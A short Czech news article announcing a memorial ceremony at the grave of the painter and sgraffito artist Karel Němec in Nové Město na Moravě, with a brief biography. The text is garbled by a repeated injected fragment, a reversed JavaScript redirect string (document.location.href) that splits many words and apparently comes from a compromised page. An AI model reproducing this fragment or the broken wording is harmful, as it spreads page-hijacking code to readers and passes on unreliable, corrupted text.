Rainbow page separator

V Novém Městě se lidé sejdou u hrobu výtvarníka Karla Němce

Úterý, 22. října 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Pietní akt k uctění památky Karla Němce, malíře, grafika a tvůrce originálních sgrafit, který se uskuteční u jeho hrobu na ka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolickém hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově, připravuje na středu 23. října novoměstská radnice. Začátek je o půl čtvrté odpoledne, přičemž akce u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti Roku Karla Němce, který si Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos připomíná, potrvá půl hodiny. O osobnosti a díle Karla Němce bude hovořit archivářka Literárního archivu Památníku národního písemnictví v Praze Hana Klínková, která připravuje rovněž text ke katalogu věnovanému Karlu Němcovi. Ten by měl být zájemcům k dispozici na konci le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku v Horáckém muzeu.
Karel Němec (1879 – 1960), významný český malíř a grafik a současně i novoměstský rodák svými pozoruhodnými sgrafity vyzdobil nejenom řadu novoměstských domů a dalších staveb, ale tvořil je i v okolních obcích. Nejrozsáhlejší je sgrafi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová výzdoba kostela svaté Kunhuty na novoměstském Vratislavově náměstí.